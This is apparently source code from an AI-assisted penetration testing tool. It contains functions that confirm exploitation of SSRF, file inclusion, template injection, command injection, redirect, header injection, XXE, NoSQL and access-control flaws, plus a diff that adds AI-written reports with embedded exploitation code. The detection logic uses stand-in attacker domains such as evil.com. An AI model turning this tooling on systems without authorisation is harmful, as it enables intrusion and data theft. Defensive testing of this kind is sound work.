    """SSRF proof: response contains actual internal/cloud resource content.

    IMPORTANT: Status/length diff alone is NOT proof of SSRF.
    Must show actual internal resource content.
    """
    body_lower = body.lower()
    # Check for cloud metadata content (markers must be payload-induced,
    # i.e. absent from the baseline response)
    metadata_found = []
    for marker in SSRF_METADATA_MARKERS:
        if marker.lower() in body_lower:
            # Additional check: marker must NOT be in baseline
            if baseline:
                baseline_lower = baseline.get("body", "").lower()
                if marker.lower() in baseline_lower:
                    continue
            metadata_found.append(marker)
    if len(metadata_found) >= 2:
        # Multiple metadata fields = strong SSRF proof
        return ProofResult(
            True, "cloud_metadata",
            f"Cloud metadata content: {', '.join(metadata_found[:5])}",
            60, impact_demonstrated=True
        )
    if len(metadata_found) == 1:
        # A single marker could be coincidental — proven but weaker
        return ProofResult(
            True, "partial_metadata",
            f"Partial metadata: {metadata_found[0]}",
            40, impact_demonstrated=False
        )
    # Check for /etc/passwd via SSRF (file:// style retrieval)
    for marker in FILE_CONTENT_MARKERS:
        if marker.lower() in body_lower:
            if baseline:
                if marker.lower() in baseline.get("body", "").lower():
                    continue
            return ProofResult(
                True, "internal_file",
                f"Internal file content via SSRF: {marker}",
                60, impact_demonstrated=True
            )
    # Status/length diff alone is NOT SSRF proof
    return ProofResult(
        False, "",
        "No internal resource content found (status/length diff alone is insufficient)",
        0
    )
def _proof_ssrf_cloud(self, payload: str, body: str, status: int,
                      headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Cloud-targeted SSRF: same evidence rules as the generic SSRF proof."""
    return self._proof_ssrf(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# LFI / Path Traversal Proofs
# ------------------------------------------------------------------
def _proof_lfi(self, payload: str, body: str, status: int,
               headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """LFI proof: the response must contain known file-content markers."""
    haystack = body.lower()
    reference = baseline.get("body", "").lower() if baseline else ""
    for marker in FILE_CONTENT_MARKERS:
        needle = marker.lower()
        # A marker only counts when the payload induced it, i.e. it is
        # present in the attack response but absent from the baseline.
        if needle in haystack and needle not in reference:
            return ProofResult(
                True, "file_content",
                f"File content marker: {marker}",
                60, impact_demonstrated=True
            )
    return ProofResult(False, "", "No file content markers found", 0)
def _proof_path_traversal(self, payload: str, body: str, status: int,
                          headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Path traversal: same evidence rules as the LFI proof."""
    return self._proof_lfi(payload, body, status, headers, baseline)
def _proof_path(self, payload: str, body: str, status: int,
                headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Base-type alias for "path_*" vuln types: delegates to the LFI proof."""
    return self._proof_lfi(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# SSTI Proofs
# ------------------------------------------------------------------
def _proof_ssti(self, payload: str, body: str, status: int,
                headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """SSTI proof: a known template arithmetic expression was evaluated."""
    sent = payload or ""
    for expr, result in SSTI_EXPRESSIONS.items():
        if expr not in sent:
            continue
        # Evaluation is proven when the arithmetic result appears in the
        # body while the raw expression does not (not merely echoed back).
        if result in body and expr not in body:
            return ProofResult(
                True, "expression_evaluated",
                f"Template expression {expr}={result} evaluated",
                60, impact_demonstrated=True
            )
    return ProofResult(False, "", "No template expression evaluation detected", 0)
# ------------------------------------------------------------------
# RCE / Command Injection Proofs
# ------------------------------------------------------------------
def _proof_rce(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""RCE proof: command output markers in response."""
for pat in _compiled_cmd_patterns:
m = pat.search(body)
if m:
if baseline:
if pat.search(baseline.get("body", "")):
continue
return ProofResult(
True, "command_output",
f"Command output: {m.group()[:80]}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No command output markers found", 0)
def _proof_command(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_rce(payload, body, status, headers, baseline)
def _proof_command_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_rce(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# Open Redirect Proofs
# ------------------------------------------------------------------
def _proof_open(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_open_redirect(payload, body, status, headers, baseline)
def _proof_open_redirect(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Open redirect proof: Location header points to attacker-controlled domain."""
if status not in (301, 302, 303, 307, 308):
return ProofResult(False, "", "No redirect status code", 0)
location = headers.get("Location", headers.get("location", ""))
if not location:
return ProofResult(False, "", "No Location header", 0)
# Check if Location contains the injected external domain
if payload and any(domain in location.lower() for domain in
["evil.com", "attacker.com", "example.com"]
if domain in payload.lower()):
return ProofResult(
True, "redirect_to_external",
f"Redirect to attacker domain: {location[:200]}",
60, impact_demonstrated=True
)
# Protocol-relative redirect
if location.startswith("//") and any(
domain in location for domain in ["evil.com", "attacker.com"]
if domain in (payload or "")
):
return ProofResult(
True, "protocol_relative_redirect",
f"Protocol-relative redirect: {location[:200]}",
60, impact_demonstrated=True
)
# Meta-refresh redirect in body
meta_pattern = r'<meta[^>]*http-equiv=["\']refresh["\'][^>]*url=([^"\'>\s]+)'
meta_match = re.search(meta_pattern, body, re.IGNORECASE)
if meta_match:
redirect_url = meta_match.group(1)
if any(domain in redirect_url.lower() for domain in
["evil.com", "attacker.com"] if domain in (payload or "").lower()):
return ProofResult(
True, "meta_refresh_redirect",
f"Meta-refresh redirect: {redirect_url[:200]}",
30, impact_demonstrated=False
)
return ProofResult(False, "", "No external redirect detected", 0)
# ------------------------------------------------------------------
# CRLF / Header Injection Proofs
# ------------------------------------------------------------------
def _proof_crlf(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_crlf_injection(payload, body, status, headers, baseline)
def _proof_crlf_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""CRLF proof: injected header appears in response headers."""
injected_header_names = ["X-Injected", "X-CRLF-Test", "Set-Cookie"]
for hdr_name in injected_header_names:
if hdr_name.lower() in (payload or "").lower():
val = headers.get(hdr_name, headers.get(hdr_name.lower(), ""))
if val and ("injected" in val.lower() or "crlf" in val.lower()
or "test" in val.lower()):
return ProofResult(
True, "header_injected",
f"Injected header: {hdr_name}: {val[:100]}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No injected headers found", 0)
def _proof_header(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_crlf_injection(payload, body, status, headers, baseline)
def _proof_header_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_crlf_injection(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# XXE Proofs
# ------------------------------------------------------------------
def _proof_xxe(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""XXE proof: file content or SSRF response from entity expansion."""
body_lower = body.lower()
for marker in FILE_CONTENT_MARKERS:
if marker.lower() in body_lower:
if baseline and marker.lower() in baseline.get("body", "").lower():
continue
return ProofResult(
True, "xxe_file_read",
f"XXE entity expansion: {marker}",
60, impact_demonstrated=True
)
# XXE SSRF: metadata markers
for marker in SSRF_METADATA_MARKERS:
if marker.lower() in body_lower:
if baseline and marker.lower() in baseline.get("body", "").lower():
continue
return ProofResult(
True, "xxe_ssrf",
f"XXE SSRF: {marker}",
60, impact_demonstrated=True
)
return ProofResult(False, "", "No XXE entity expansion detected", 0)
# ------------------------------------------------------------------
# NoSQL Injection Proofs
# ------------------------------------------------------------------
def _proof_nosql(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_nosql_injection(payload, body, status, headers, baseline)
def _proof_nosql_injection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""NoSQL injection proof: MongoDB/NoSQL error or boolean response diff."""
body_lower = body.lower()
nosql_errors = [
r"MongoError", r"mongo.*(?:syntax|parse|query).*error",
r"BSONTypeError", r"CastError.*ObjectId",
]
for pat_str in nosql_errors:
m = re.search(pat_str, body, re.IGNORECASE)
if m:
if baseline and re.search(pat_str, baseline.get("body", ""), re.IGNORECASE):
continue
return ProofResult(
True, "nosql_error",
f"NoSQL error: {m.group()[:80]}",
60, impact_demonstrated=True
)
# Boolean-based blind NoSQL
if baseline and ("$gt" in (payload or "") or "$ne" in (payload or "")):
baseline_len = len(baseline.get("body", ""))
diff_pct = abs(len(body) - baseline_len) / max(baseline_len, 1) * 100
if diff_pct > 20:
return ProofResult(
True, "nosql_boolean",
f"NoSQL boolean diff: {diff_pct:.0f}%",
45, impact_demonstrated=False
)
return ProofResult(False, "", "No NoSQL error or boolean diff", 0)
# ------------------------------------------------------------------
# IDOR Proofs
# ------------------------------------------------------------------
def _proof_idor(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""IDOR proof: accessing another user's resource with data comparison.
CRITICAL: HTTP status codes are NOT reliable for access control.
We verify by checking actual response DATA, not just status/length.
"""
return self._proof_access_control(payload, body, status, headers, baseline, "idor")
def _proof_bola(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""BOLA proof: API object-level authorization with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "bola")
def _proof_bfla(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""BFLA proof: function-level authorization with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "bfla")
def _proof_privilege_escalation(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Privilege escalation proof with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "privilege_escalation")
def _proof_auth_bypass(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Auth bypass proof: verify authenticated content is actually returned."""
return self._proof_access_control(payload, body, status, headers, baseline, "auth_bypass")
def _proof_forced_browsing(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Forced browsing proof with data comparison."""
return self._proof_access_control(payload, body, status, headers, baseline, "forced_browsing")
    def _proof_access_control(self, payload: str, body: str, status: int,
                              headers: Dict, baseline: Optional[Dict],
                              vuln_subtype: str) -> ProofResult:
        """Unified access control proof with smart data comparison.

        NEVER trusts status codes alone. Checks:
        1. Response body is NOT an error/empty/login page (false positive indicators)
        2. Response body contains ACTUAL data (JSON objects, user fields, etc.)
        3. Response body DIFFERS from baseline (different user's data)
        4. Response body does NOT contain denial indicators

        Args:
            payload: injected identifier/value (not inspected here; kept for the
                common ``_proof_*`` signature).
            body: response body of the attack request.
            status: HTTP status code of the attack response.
            headers: response headers (not inspected here; signature parity).
            baseline: optional pre-attack response dict; only its "body" key is read.
            vuln_subtype: label (idor/bola/bfla/...) embedded in proof-type names.
        """
        body_lower = body.lower().strip()
        body_len = len(body)
        # ------- FALSE POSITIVE: Empty or trivially small response -------
        if body_len < 10:
            return ProofResult(False, "", "Empty response body — no data returned", 0)
        # ------- FALSE POSITIVE: Error/denial messages in body -------
        denial_indicators = [
            "unauthorized", "forbidden", "access denied", "not authorized",
            "permission denied", "authentication required", "login required",
            "please log in", "please sign in", "invalid token", "token expired",
            "session expired", "not found", "does not exist", "no permission",
            "insufficient privileges", "you do not have access",
            '"error":', '"status":"error"', '"success":false', '"success": false',
        ]
        denial_count = sum(1 for d in denial_indicators if d in body_lower)
        # Two or more denial phrases => treat as denied regardless of status code.
        if denial_count >= 2:
            return ProofResult(
                False, "",
                f"Response contains {denial_count} denial indicators — access was denied despite status {status}",
                0
            )
        # ------- FALSE POSITIVE: Login/redirect page -------
        # NOTE(review): "login" also matches inside "<title>login", so a single
        # login page can trip several indicators at once — threshold of 3 relies
        # on that; confirm intent before tuning.
        login_indicators = [
            "<form", "type=\"password\"", "type='password'",
            'name="password"', "name='password'",
            "sign in", "log in", "login", "<title>login",
        ]
        login_count = sum(1 for l in login_indicators if l in body_lower)
        if login_count >= 3:
            return ProofResult(
                False, "",
                f"Response appears to be a login page ({login_count} login indicators)",
                0
            )
        # ------- POSITIVE: Check for actual data content -------
        data_indicators = [
            # JSON data fields (common in API responses)
            '"email":', '"name":', '"username":', '"phone":', '"address":',
            '"role":', '"balance":', '"password":', '"token":', '"secret":',
            '"orders":', '"items":', '"created_at":', '"updated_at":',
            '"first_name":', '"last_name":', '"profile":', '"account":',
            # HTML data (for web pages)
            "user-profile", "account-details", "order-history",
        ]
        data_count = sum(1 for d in data_indicators if d in body_lower)
        # ------- Compare with baseline if available -------
        if baseline:
            baseline_body = baseline.get("body", "")
            baseline_len = len(baseline_body)
            # If response is nearly identical to baseline, likely same-behavior
            if baseline_len > 0:
                diff_pct = abs(body_len - baseline_len) / max(baseline_len, 1) * 100
                baseline_lower = baseline_body.lower().strip()
                # Check if body content actually differs (not just length)
                if body_lower == baseline_lower:
                    return ProofResult(
                        False, "",
                        "Response identical to baseline — server ignores the ID parameter",
                        0
                    )
                # Content-based comparison: for access control vulns,
                # different users have similar-length responses but different data
                # Count how many data field VALUES differ between attack and baseline
                content_diff_score = self._compare_data_content(body, baseline_body)
                # Strong content difference with data indicators
                if content_diff_score >= 3 and data_count >= 2:
                    return ProofResult(
                        True, f"{vuln_subtype}_data_diff",
                        f"Different data content returned ({content_diff_score} field values differ, "
                        f"{data_count} data fields found) — likely another user's data",
                        40, impact_demonstrated=True
                    )
                # Significant length difference with data indicators
                if diff_pct > 10 and data_count >= 2:
                    return ProofResult(
                        True, f"{vuln_subtype}_data_diff",
                        f"Different data returned ({diff_pct:.0f}% content diff, "
                        f"{data_count} data fields found) — likely another user's data",
                        40, impact_demonstrated=True
                    )
                # Moderate content or length difference
                if (content_diff_score >= 2 or diff_pct > 5) and data_count >= 1:
                    return ProofResult(
                        True, f"{vuln_subtype}_content_diff",
                        f"Content differs from baseline ({content_diff_score} values differ, "
                        f"{diff_pct:.0f}% len diff, {data_count} data fields) — possible cross-user access",
                        30, impact_demonstrated=False
                    )
        # No baseline — check if response has meaningful data
        # NOTE(review): this branch is also reached when a baseline EXISTS but
        # none of the diff thresholds above fired; the "no baseline for
        # comparison" wording then overstates — confirm intended behavior.
        if data_count >= 3:
            return ProofResult(
                True, f"{vuln_subtype}_data_present",
                f"Response contains {data_count} data fields (no baseline for comparison)",
                25, impact_demonstrated=False
            )
        if data_count >= 1 and status == 200 and denial_count == 0:
            return ProofResult(
                True, f"{vuln_subtype}_possible",
                f"Response has data ({data_count} fields) and no denial — needs manual verification",
                15, impact_demonstrated=False
            )
        return ProofResult(
            False, "",
            f"Cannot verify {vuln_subtype}: {data_count} data fields, "
            f"{denial_count} denial indicators, status {status}",
            0
        )
@staticmethod
def _compare_data_content(body_a: str, body_b: str) -> int:
"""Compare two response bodies for data-level differences.
Extracts JSON-like key:value pairs and counts how many values differ
between the two responses. This is essential for access control testing
where response LENGTHS are similar but the actual DATA differs
(e.g., different user profiles).
Returns number of differing field values (0 = identical data).
"""
import json as _json
# Try JSON parsing first
try:
data_a = _json.loads(body_a)
data_b = _json.loads(body_b)
if isinstance(data_a, dict) and isinstance(data_b, dict):
diff_count = 0
all_keys = set(data_a.keys()) | set(data_b.keys())
for key in all_keys:
val_a = str(data_a.get(key, ""))
val_b = str(data_b.get(key, ""))
if val_a != val_b:
diff_count += 1
return diff_count
except (ValueError, TypeError):
pass
# Fallback: regex-based extraction of "key":"value" pairs
kv_pattern = re.compile(r'"(\w+)":\s*"([^"]*)"')
pairs_a = dict(kv_pattern.findall(body_a))
pairs_b = dict(kv_pattern.findall(body_b))
if not pairs_a and not pairs_b:
# Not JSON-like; do simple line-level comparison
lines_a = set(body_a.strip().splitlines())
lines_b = set(body_b.strip().splitlines())
return len(lines_a.symmetric_difference(lines_b))
all_keys = set(pairs_a.keys()) | set(pairs_b.keys())
return sum(1 for k in all_keys if pairs_a.get(k) != pairs_b.get(k))
# ------------------------------------------------------------------
# Host Header Injection
# ------------------------------------------------------------------
def _proof_host(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_host_header_injection(payload, body, status, headers, baseline)
def _proof_host_header_injection(self, payload: str, body: str, status: int,
headers: Dict,
baseline: Optional[Dict]) -> ProofResult:
"""Host header injection: injected host reflected in response body/links."""
evil_hosts = ["evil.com", "attacker.com", "injected.host"]
body_lower = body.lower()
for host in evil_hosts:
if host in (payload or "").lower() and host in body_lower:
if baseline and host in baseline.get("body", "").lower():
continue
return ProofResult(
True, "host_reflected",
f"Injected host '{host}' reflected in response",
50, impact_demonstrated=False
)
return ProofResult(False, "", "Injected host not reflected", 0)
# ------------------------------------------------------------------
# Inspection types (no execution proof needed)
# ------------------------------------------------------------------
def _proof_security(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_cors(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_clickjacking(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_directory(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_debug(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_information(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_insecure(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
return self._proof_inspection(payload, body, status, headers, baseline)
def _proof_inspection(self, payload: str, body: str, status: int,
headers: Dict, baseline: Optional[Dict]) -> ProofResult:
"""Inspection types: proof is the header/config itself being present/absent."""
return ProofResult(
True, "inspection",
"Inspection-type finding — proof is configuration state",
50, impact_demonstrated=False
)
# ------------------------------------------------------------------
# Default / Unknown types
# ------------------------------------------------------------------
def _proof_default(self, vuln_type: str, payload: str, body: str,
status: int, headers: Dict,
baseline: Optional[Dict]) -> ProofResult:
"""Default: conservative scoring for unknown vuln types."""
# Check basic payload effect (reflected + different from baseline)
if payload and payload.lower() in body.lower():
if baseline:
baseline_body = baseline.get("body", "")
if payload.lower() not in baseline_body.lower():
return ProofResult(
True, "payload_reflected",
f"Payload reflected (not in baseline) for {vuln_type}",
25, impact_demonstrated=False
)
return ProofResult(
False, "reflected_no_baseline",
f"Payload reflected but no baseline to compare for {vuln_type}",
10
)
return ProofResult(
False, "",
f"No proof of execution for {vuln_type}",
0
)
+439 -18
View File
@@ -1,8 +1,10 @@
"""
NeuroSploit v3 - Report Generator
Generates professional HTML, PDF, and JSON reports.
Generates professional HTML, PDF, and JSON reports
with OHVR structure and embedded screenshots.
"""
import base64
import json
from datetime import datetime
from pathlib import Path
@@ -23,8 +25,12 @@ class ReportGenerator:
"info": "#6c757d"
}
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
def __init__(self):
self.reports_dir = settings.REPORTS_DIR
self._scan_id: Optional[str] = None
self._tool_executions: List = []
async def generate(
self,
@@ -34,7 +40,8 @@ class ReportGenerator:
title: Optional[str] = None,
include_executive_summary: bool = True,
include_poc: bool = True,
include_remediation: bool = True
include_remediation: bool = True,
tool_executions: Optional[List] = None,
) -> Tuple[Path, str]:
"""
Generate a report.
@@ -42,6 +49,8 @@ class ReportGenerator:
Returns:
Tuple of (file_path, executive_summary)
"""
self._scan_id = str(scan.id) if scan else None
self._tool_executions = tool_executions or []
title = title or f"Security Assessment Report - {scan.name}"
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
@@ -69,12 +78,94 @@ class ReportGenerator:
else:
raise ValueError(f"Unsupported format: {format}")
# Save report
file_path = self.reports_dir / filename
# Save report in a per-report folder with screenshots
report_dir = self.reports_dir / f"report_{timestamp}"
report_dir.mkdir(parents=True, exist_ok=True)
file_path = report_dir / filename
file_path.write_text(content)
# Copy screenshots into the report folder
self._copy_screenshots_to_report(vulnerabilities, report_dir)
return file_path, executive_summary
async def generate_ai_report(
self,
scan: Scan,
vulnerabilities: List[Vulnerability],
tool_executions: Optional[List] = None,
title: Optional[str] = None,
) -> Tuple[Path, str]:
"""Generate an AI-enhanced report with LLM-written executive summary and per-finding analysis."""
from core.llm_manager import LLMManager
self._scan_id = str(scan.id) if scan else None
self._tool_executions = tool_executions or []
title = title or f"AI Security Assessment Report - {scan.name}"
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
# Build findings context for AI
findings_context = []
for v in vulnerabilities:
findings_context.append(
f"- [{v.severity.upper()}] {v.title}: {v.vulnerability_type} at "
f"{v.affected_endpoint or 'N/A'}"
f"{' | CWE: ' + v.cwe_id if v.cwe_id else ''}"
f"{' | CVSS: ' + str(v.cvss_score) if v.cvss_score else ''}"
)
tools_context = ""
if self._tool_executions:
tools_lines = []
for te in self._tool_executions:
tools_lines.append(
f"- {te.get('tool', 'unknown')}: {te.get('command', '')} "
f"({te.get('duration', 0)}s, {te.get('findings_count', 0)} findings)"
)
tools_context = "\n\nTools executed:\n" + "\n".join(tools_lines)
total = len(vulnerabilities)
critical = sum(1 for v in vulnerabilities if v.severity == "critical")
high = sum(1 for v in vulnerabilities if v.severity == "high")
medium = sum(1 for v in vulnerabilities if v.severity == "medium")
low = sum(1 for v in vulnerabilities if v.severity == "low")
prompt = (
f"Write a professional executive summary for a penetration test report.\n"
f"Target: {scan.name}\n"
f"Total findings: {total} (Critical: {critical}, High: {high}, Medium: {medium}, Low: {low})\n\n"
f"Findings:\n" + "\n".join(findings_context[:30]) + tools_context + "\n\n"
f"Write 3-4 paragraphs covering: overall risk posture, key critical findings, "
f"attack surface observations, and prioritized remediation recommendations. "
f"Be specific and reference actual findings. Professional tone."
)
# Generate AI executive summary
try:
llm = LLMManager()
ai_summary = await llm.generate(
prompt,
"You are a senior penetration testing consultant writing a client-facing report."
)
except Exception:
ai_summary = self._generate_executive_summary(scan, vulnerabilities)
# Generate HTML with AI summary
content = self._generate_html(
scan, vulnerabilities, title,
ai_summary, include_poc=True, include_remediation=True
)
report_dir = self.reports_dir / f"report_{timestamp}"
report_dir.mkdir(parents=True, exist_ok=True)
filename = f"report_{timestamp}.html"
file_path = report_dir / filename
file_path.write_text(content)
self._copy_screenshots_to_report(vulnerabilities, report_dir)
return file_path, ai_summary
def _generate_executive_summary(self, scan: Scan, vulnerabilities: List[Vulnerability]) -> str:
"""Generate executive summary text"""
total = len(vulnerabilities)
@@ -110,27 +201,81 @@ Overall Risk Level: {risk_level}
include_remediation: bool
) -> str:
"""Generate HTML report"""
# Count by severity
# Separate confirmed and rejected vulnerabilities
confirmed_vulns = [v for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') != 'ai_rejected']
rejected_vulns = [v for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') == 'ai_rejected']
# Count by severity (confirmed only)
severity_counts = {
"critical": sum(1 for v in vulnerabilities if v.severity == "critical"),
"high": sum(1 for v in vulnerabilities if v.severity == "high"),
"medium": sum(1 for v in vulnerabilities if v.severity == "medium"),
"low": sum(1 for v in vulnerabilities if v.severity == "low"),
"info": sum(1 for v in vulnerabilities if v.severity == "info")
"critical": sum(1 for v in confirmed_vulns if v.severity == "critical"),
"high": sum(1 for v in confirmed_vulns if v.severity == "high"),
"medium": sum(1 for v in confirmed_vulns if v.severity == "medium"),
"low": sum(1 for v in confirmed_vulns if v.severity == "low"),
"info": sum(1 for v in confirmed_vulns if v.severity == "info")
}
total = sum(severity_counts.values())
# Generate vulnerability cards
# Sort vulnerabilities by severity (Critical first, Info last)
confirmed_vulns = sorted(
confirmed_vulns,
key=lambda v: self.SEVERITY_ORDER.get(v.severity, 5)
)
rejected_vulns = sorted(
rejected_vulns,
key=lambda v: self.SEVERITY_ORDER.get(v.severity, 5)
)
# Generate vulnerability cards for confirmed findings
vuln_cards = ""
for vuln in vulnerabilities:
for vuln in confirmed_vulns:
color = self.SEVERITY_COLORS.get(vuln.severity, "#6c757d")
poc_section = ""
if include_poc and (vuln.poc_request or vuln.poc_payload):
if include_poc and (vuln.poc_request or vuln.poc_payload or getattr(vuln, 'poc_code', None)):
# Build screenshot HTML if available
screenshots_html = self._build_screenshots_html(vuln)
# Build PoC code section (generated HTML/Python/curl exploitation code)
poc_code_html = ""
poc_code_value = getattr(vuln, 'poc_code', None) or ""
if poc_code_value:
# Determine language for syntax hint
if poc_code_value.strip().startswith("<!DOCTYPE") or poc_code_value.strip().startswith("<html") or poc_code_value.strip().startswith("<!--"):
lang_label = "HTML"
elif poc_code_value.strip().startswith("#!/usr/bin/env python") or "import requests" in poc_code_value:
lang_label = "Python"
elif poc_code_value.strip().startswith("curl ") or poc_code_value.strip().startswith("#"):
lang_label = "Shell/curl"
else:
lang_label = "PoC Code"
poc_code_html = f"""
<div class="ohvr-section">
<h5>Exploitation Code ({lang_label})</h5>
<div class="code-block"><pre>{self._escape_html(poc_code_value[:5000])}</pre></div>
</div>"""
poc_section = f"""
<div class="poc-section">
<h4>Proof of Concept</h4>
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_payload or "")}</pre></div>' if vuln.poc_payload else ''}
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_request[:1000] if vuln.poc_request else "")}</pre></div>' if vuln.poc_request else ''}
<div class="ohvr-section">
<h5>Observation</h5>
<p>{self._escape_html(vuln.description or 'Security-relevant behavior detected at the affected endpoint.')}</p>
</div>
<div class="ohvr-section">
<h5>Hypothesis</h5>
<p>The endpoint may be vulnerable to {self._escape_html(vuln.vulnerability_type or 'the identified attack vector')} based on observed behavior.</p>
</div>
<div class="ohvr-section">
<h5>Validation</h5>
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_payload or "")}</pre></div>' if vuln.poc_payload else ''}
{f'<div class="code-block"><pre>{self._escape_html(vuln.poc_request[:1000] if vuln.poc_request else "")}</pre></div>' if vuln.poc_request else ''}
{screenshots_html}
</div>
{poc_code_html}
<div class="ohvr-section">
<h5>Result</h5>
<p>{self._escape_html(vuln.impact or 'Vulnerability confirmed through the validation steps above.')}</p>
</div>
</div>
"""
@@ -264,6 +409,41 @@ Overall Risk Level: {risk_level}
word-wrap: break-word;
}}
.executive-summary {{ white-space: pre-wrap; }}
.ohvr-section {{
margin: 1rem 0;
padding: 1rem;
background: rgba(0,0,0,0.2);
border-radius: 8px;
}}
.ohvr-section h5 {{
color: var(--accent);
margin-bottom: 0.5rem;
text-transform: uppercase;
font-size: 0.8rem;
letter-spacing: 1px;
}}
.screenshot-grid {{
display: grid;
grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
gap: 1rem;
margin: 1rem 0;
}}
.screenshot-card {{
border: 1px solid var(--border);
border-radius: 8px;
overflow: hidden;
}}
.screenshot-card img {{
width: 100%;
height: auto;
display: block;
}}
.screenshot-caption {{
padding: 0.5rem;
font-size: 0.8rem;
color: var(--text-secondary);
text-align: center;
}}
.severity-chart {{
display: flex;
height: 30px;
@@ -312,10 +492,16 @@ Overall Risk Level: {risk_level}
</div>''' if executive_summary else ''}
<div class="section">
<h2>Vulnerability Findings</h2>
{vuln_cards if vuln_cards else '<p>No vulnerabilities found.</p>'}
<h2>Vulnerability Findings ({total} Confirmed)</h2>
{vuln_cards if vuln_cards else '<p>No confirmed vulnerabilities found.</p>'}
</div>
{self._build_rejected_findings_section(rejected_vulns)}
{self._build_screenshots_gallery(confirmed_vulns)}
{self._build_tools_section()}
<div class="footer">
<p>Generated by NeuroSploit v3 - AI-Powered Penetration Testing Platform</p>
</div>
@@ -354,10 +540,245 @@ Overall Risk Level: {risk_level}
"info": scan.info_count
}
},
"vulnerabilities": [v.to_dict() for v in vulnerabilities]
"vulnerabilities": [v.to_dict() for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') != 'ai_rejected'],
"rejected_findings": [v.to_dict() for v in vulnerabilities if getattr(v, 'validation_status', 'ai_confirmed') == 'ai_rejected'],
"tool_executions": self._tool_executions
}
return json.dumps(report, indent=2, default=str)
def _build_screenshots_html(self, vuln) -> str:
"""Build screenshot grid HTML for a vulnerability.
Sources (in order of priority):
1. vuln.screenshots list with base64 data URIs (from agent capture)
2. Filesystem lookup in reports/screenshots/{finding_id}/ (from BrowserValidator)
"""
data_uris = []
# Source 1: base64 screenshots embedded in the vulnerability object
inline_screenshots = getattr(vuln, 'screenshots', None) or []
for ss in inline_screenshots:
if isinstance(ss, str) and ss.startswith("data:image/"):
data_uris.append(ss)
# Source 2: filesystem screenshots (finding_id = md5(vuln_type+url+param)[:8])
# Check scan-scoped path first, then legacy flat path
if not data_uris:
import hashlib
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
vuln_type = getattr(vuln, 'vulnerability_type', '') or ''
vuln_url = getattr(vuln, 'url', '') or getattr(vuln, 'affected_endpoint', '') or ''
vuln_param = getattr(vuln, 'parameter', '') or getattr(vuln, 'poc_parameter', '') or ''
finding_id = hashlib.md5(f"{vuln_type}{vuln_url}{vuln_param}".encode()).hexdigest()[:8]
# Scan-scoped path: reports/screenshots/{scan_id}/{finding_id}/
finding_dir = None
if self._scan_id:
scan_dir = screenshots_base / self._scan_id / finding_id
if scan_dir.exists():
finding_dir = scan_dir
# Fallback: legacy flat path reports/screenshots/{finding_id}/
